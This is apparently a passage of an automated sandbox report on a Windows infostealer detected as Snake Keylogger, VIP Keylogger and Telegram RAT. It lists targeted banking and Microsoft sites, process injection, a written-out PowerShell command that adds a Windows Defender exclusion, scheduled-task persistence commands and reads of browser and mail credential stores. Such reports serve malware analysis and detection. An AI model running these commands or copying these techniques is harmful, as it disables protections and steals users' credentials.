Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: qggKEJlcsFa.exe, 0000000C.00000002.3889103386.0000000000ED5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd0c78d1de58e2
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcee7481a05c80<
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe

Code function: 7_2_06599548 LdrInitializeThunk,

7_2_06599548

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe"
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Memory written: C:\Users\user\Desktop\EUYIlr7uUX.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Memory written: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe"	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp16F6.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process created: C:\Users\user\Desktop\EUYIlr7uUX.exe "C:\Users\user\Desktop\EUYIlr7uUX.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp2369.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process created: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe"	Jump to behavior

Source: EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR
Source: EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerh
Source: EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager8

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Queries volume information: C:\Users\user\Desktop\EUYIlr7uUX.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Queries volume information: C:\Users\user\Desktop\EUYIlr7uUX.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Queries volume information: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Queries volume information: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000C.00000002.3891278217.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3891777327.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 12.2.qggKEJlcsFa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3cd9970.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3d1f790.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EUYIlr7uUX.exe PID: 7436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EUYIlr7uUX.exe PID: 7772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qggKEJlcsFa.exe PID: 8064, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 12.2.qggKEJlcsFa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3cd9970.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3d1f790.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EUYIlr7uUX.exe PID: 7436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EUYIlr7uUX.exe PID: 7772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qggKEJlcsFa.exe PID: 8064, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3cd9970.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3d1f790.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EUYIlr7uUX.exe PID: 7436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EUYIlr7uUX.exe PID: 7772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qggKEJlcsFa.exe PID: 8064, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000C.00000002.3891278217.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3891777327.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 12.2.qggKEJlcsFa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3cd9970.3.unpack, type: UNPACKEDPE
